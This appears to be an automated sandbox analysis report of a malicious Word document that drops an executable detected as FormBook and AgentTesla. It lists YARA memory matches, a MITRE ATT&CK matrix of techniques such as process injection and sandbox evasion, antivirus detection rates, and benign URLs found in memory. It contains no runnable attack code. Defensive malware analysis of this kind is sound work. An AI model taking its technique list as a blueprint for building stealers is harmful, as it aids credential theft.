Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Users\Public\Documents\nothinglittle.exe	Queries volume information: C:\Users\Public\Documents\nothinglittle.exe VolumeInformation

Source: C:\Users\Public\Documents\nothinglittle.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection212	Masquerading1	OS Credential Dumping	Security Software Discovery331	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution12	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion41	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection212	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting22	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information41	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Timestomp1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Extra Window Memory Injection1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFL_PO 69002.doc	15%	Virustotal		Browse
RFL_PO 69002.doc	22%	ReversingLabs	Script-Macro.Downloader.EncDoc
RFL_PO 69002.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	26%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
28.0.nothinglittle.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
28.2.nothinglittle.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Virustotal		Browse
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dailymail.co.uk/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.fontbureau.com/designers	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://in.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.msn.com/?ocid=iehpg	explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ozu.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://graph.windows.net	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.ask.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.de/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://ncus.contentsync.	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0L	nothinglittle.exe.9.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://weather.service.msn.com/data.aspx	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehp1	explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	false		high
http://google.pchome.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.sify.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://wus2.contentsync.	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gmarket.co.kr/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.google.si/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.soso.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://outlook.office365.com/api/v1.0/me/Activities	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://clients.config.office.net/user/v1.0/android/policies	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://busca.orange.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	false		high
http://www.target.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.orange.co.uk/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.centrum.cz/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://service2.bfast.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
